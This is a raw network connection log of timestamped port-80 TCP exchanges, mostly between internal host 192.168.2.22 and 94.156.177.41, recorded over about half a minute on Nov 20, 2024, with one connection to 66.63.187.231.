Nov 20, 2024 10:12:50.250497103 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.250586987 CET	49248	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.254460096 CET	49248	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.259948015 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.259999037 CET	49248	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.264914036 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.995508909 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.995620966 CET	49248	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:50.995631933 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:50.995698929 CET	49248	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.002481937 CET	80	49248	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.123445034 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.128449917 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.128532887 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.130161047 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.135036945 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.135097980 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.140201092 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.871305943 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.871331930 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:51.871431112 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.890882969 CET	49249	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:51.895819902 CET	80	49249	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.038171053 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.052120924 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.052234888 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.054603100 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.064189911 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.064243078 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.074043036 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.935475111 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.935861111 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:52.935941935 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.939876080 CET	49250	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:52.945427895 CET	80	49250	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:53.174222946 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:53.182025909 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:53.182094097 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:53.185000896 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:53.190041065 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:53.190103054 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:53.195029974 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.054186106 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.054244041 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.054312944 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.054357052 CET	49251	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.059284925 CET	80	49251	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.183536053 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.188473940 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.190258980 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.191947937 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.196935892 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:54.198385954 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:54.203614950 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.067984104 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.068247080 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.068267107 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.068320990 CET	49252	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.073292971 CET	80	49252	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.193181992 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.198395967 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.198463917 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.200165987 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.205310106 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.205372095 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.211005926 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.953423023 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.953536987 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:55.953617096 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.956464052 CET	49253	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:55.961425066 CET	80	49253	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.108771086 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.113725901 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.113821030 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.115456104 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.120740891 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.120814085 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.125767946 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.843785048 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.843843937 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.843899965 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.844203949 CET	49254	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.849610090 CET	80	49254	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.988785028 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.993751049 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:56.993825912 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:56.996800900 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.001676083 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.001730919 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.006695032 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.763031006 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.763077021 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.763166904 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.763350964 CET	49255	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.768460989 CET	80	49255	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.893670082 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.901793003 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.901892900 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.903553963 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.910604000 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:57.910681963 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:57.918431997 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.780607939 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.781256914 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.781338930 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.798852921 CET	49256	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.804069996 CET	80	49256	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.974746943 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.983860016 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.983916998 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.987746954 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.994018078 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:58.994067907 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:58.999279976 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.717789888 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.717916965 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.717969894 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.718206882 CET	49257	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.724298954 CET	80	49257	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.844295979 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.850050926 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.850119114 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.851802111 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.856637001 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:59.856694937 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:59.862026930 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.661886930 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:13:00.715209007 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.715396881 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.715655088 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.715723991 CET	49258	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.720254898 CET	80	49258	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.847992897 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.852982044 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.853058100 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.854696035 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.859559059 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:00.859620094 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:00.864456892 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.604186058 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.604198933 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.604316950 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.612099886 CET	49259	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.618232012 CET	80	49259	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.792247057 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.797516108 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.797589064 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.802095890 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.807039976 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:01.807106018 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:01.812235117 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.699595928 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.699740887 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.699754000 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.699800014 CET	49260	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.706048012 CET	80	49260	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.852432966 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.857686043 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.857769012 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.860096931 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.864919901 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:02.864989996 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:02.870049000 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.729377031 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.729523897 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.729672909 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.729727030 CET	49261	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.734512091 CET	80	49261	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.867440939 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.875511885 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.875629902 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.877337933 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.882214069 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:03.882271051 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:03.887325048 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.648056984 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.648129940 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.648478985 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.648519993 CET	49262	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.655379057 CET	80	49262	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.772304058 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.780376911 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.780491114 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.782109022 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.788630009 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:04.788702965 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:04.793773890 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.554836035 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.554848909 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.554935932 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.554935932 CET	49263	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.559942007 CET	80	49263	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.693496943 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.701008081 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.701095104 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.702789068 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.710263014 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:05.710359097 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:05.718780994 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.563930035 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.564081907 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.564234018 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.564368010 CET	49264	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.568943024 CET	80	49264	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.701910019 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.707001925 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.707206964 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.709011078 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.715912104 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:06.715979099 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:06.721139908 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.564760923 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.564935923 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.565009117 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.565052032 CET	49265	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.572721958 CET	80	49265	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.690493107 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.698745966 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.698832035 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.719913006 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.728288889 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:07.728341103 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:07.736788034 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.449316978 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.449518919 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.449672937 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.449727058 CET	49266	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.454411030 CET	80	49266	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.580527067 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.588155031 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.588236094 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.590316057 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.595607996 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:08.595685959 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:08.601305008 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.331041098 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.331053972 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.331161976 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.331197023 CET	49267	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.336369991 CET	80	49267	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.466706991 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.474982977 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.475083113 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.476685047 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.484504938 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:09.484579086 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:09.492249012 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.215668917 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.215842009 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.215883017 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.215930939 CET	49268	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.224674940 CET	80	49268	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.343473911 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.353955984 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.354067087 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.355726957 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.363971949 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:10.364041090 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:10.372134924 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.234061956 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.234113932 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.234164953 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.236413002 CET	49269	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.239377022 CET	80	49269	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.370659113 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.376260996 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.376352072 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.377935886 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.382894039 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:11.382962942 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:11.387973070 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.128077984 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.128248930 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.128276110 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.128334045 CET	49270	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.133372068 CET	80	49270	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.260628939 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.265649080 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.265732050 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.267328978 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.272383928 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:12.272453070 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:12.278081894 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.149569035 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.149835110 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.149899960 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.149919033 CET	49271	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.154951096 CET	80	49271	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.274080038 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.282968998 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.283068895 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.284693003 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.292524099 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:13.292586088 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:13.299957991 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.047805071 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.047995090 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.048101902 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.048187971 CET	49272	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.053592920 CET	80	49272	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.179020882 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.184887886 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.184964895 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.186636925 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.191806078 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.191870928 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.197151899 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.920927048 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.921544075 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:14.921761036 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.924352884 CET	49273	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:14.931750059 CET	80	49273	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.052736044 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.058866978 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.059078932 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.060734987 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.065860033 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.065941095 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.070830107 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.927126884 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.927279949 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:15.927412987 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.927529097 CET	49274	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:15.934391975 CET	80	49274	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.067698002 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.072551966 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.072634935 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.074276924 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.079170942 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.079240084 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.084203005 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.829201937 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.829313993 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.829422951 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.829473972 CET	49275	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:16.839437962 CET	80	49275	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:16.999209881 CET	49276	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:17.007487059 CET	80	49276	94.156.177.41	192.168.2.22
Nov 20, 2024 10:13:17.007554054 CET	49276	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:13:17.009215117 CET	49276	80	192.168.2.22	94.156.177.41
